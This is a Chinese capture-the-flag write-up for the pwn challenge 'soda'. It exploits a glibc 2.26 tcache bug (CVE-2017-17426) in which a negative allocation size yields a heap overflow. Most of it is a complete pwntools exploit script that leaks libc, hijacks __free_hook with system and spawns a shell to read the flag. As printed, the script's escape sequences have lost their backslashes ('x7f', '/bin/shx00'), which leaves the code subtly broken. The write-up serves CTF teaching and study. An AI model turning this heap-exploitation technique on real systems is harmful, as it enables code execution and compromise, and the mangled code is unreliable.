题目考点:
-
cve-2017-17426
-
tcachebin attrack
解题方法:
首先程序在申请堆块的时候并没有检查size的正负,通过cve-2017-17426:glibc版本为2.26,当size为负数的时候会取tcache中的堆块,又由于当读取内容的时候会将size转化为无符号整型数据,因此可以通过这一点来造成堆溢出,然后就是堆溢出的常规利用,造成堆重叠然后tcache attrack劫持free_hook为system,free一个带有”/bin/shx00”的堆块从而获取shell。
exp见下:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
context.log_level = 'debug'
binary = './soda'
elf = ELF('./soda')
libc = ELF("./libc.so.6")
context.binary = binary
DEBUG = 0
if DEBUG:
p = process(binary)
# p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
else:
host = "127.0.0.1"
port = 9999
p = remote(host,port)
if DEBUG == 2:
host = ""
port = 0
user = ""
passwd = ""
p = ssh(host,port,user,passwd)
l64 = lambda :u64(p.recvuntil("x7f")[-6:].ljust(8,"x00"))
l32 = lambda :u32(p.recvuntil("xf7")[-4:].ljust(4,"x00"))
sla = lambda a,b :p.sendlineafter(str(a),str(b))
sa = lambda a,b :p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ": 0x%x" % data)
se = lambda payload: p.send(payload)
rl = lambda : p.recv()
sl = lambda payload: p.sendline(payload)
ru = lambda a :p.recvuntil(str(a))
def cmd(idx):
sla(">> ",str(idx))
def add(size,payload):
cmd(1)
sla(":n",str(size))
sa(":n",payload)
def free(idx):
cmd(2)
sla(":n",str(idx))
def free1(idx):
cmd(2)
sla(":",str(idx))
def add1(size,payload):
cmd(1)
sla(":",str(size))
sa(":",payload)
def exp():
add(0x18,"aaaa")
add(0xff,'aaaa')
free(1)
add(0xf0,"aaaa")
free(1)
add(0xe0,"aaaa")
free(1)
add(0xd0,'aaaa')
free(1)
add(0xc0,"aaaa")
free(1)
add(0xb0,"aaaa")
free(1)
free(0)
add(0xff,"aaa")
#chunk overflow
add(str(-1),"a"*0x18+p64(0x4b1))
free(0)
add(0xff,"aaa")
add(0x38,p16(0x2720))
# gdb.attach(p)
free(1)
add(0xf0,"aaa")
#leak libc_base
add(0xf0,p64(0xfbad1800)+p64(0)*3+p8(0x88))
libc_base = l64()-libc.sym["_IO_2_1_stdin_"]
lg("libc_base",libc_base)
#tcache attrack
free1(0)
free1(1)
free1(2)
add1(0x38,p64(libc_base+libc.sym["__free_hook"]))
add1(0x38,"/bin/shx00")
add1(0x38,p64(libc_base+libc.sym["system"]))
free1(1)
p.sendline("cat flag")
p.interactive()
while True:
p = remote(host,port)
try:
exp()
except:
p.close()
点个在看你最好看
本文始发于微信公众号(胖哈勃):【迎中秋】公开赛writeup|Pwn-soda
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论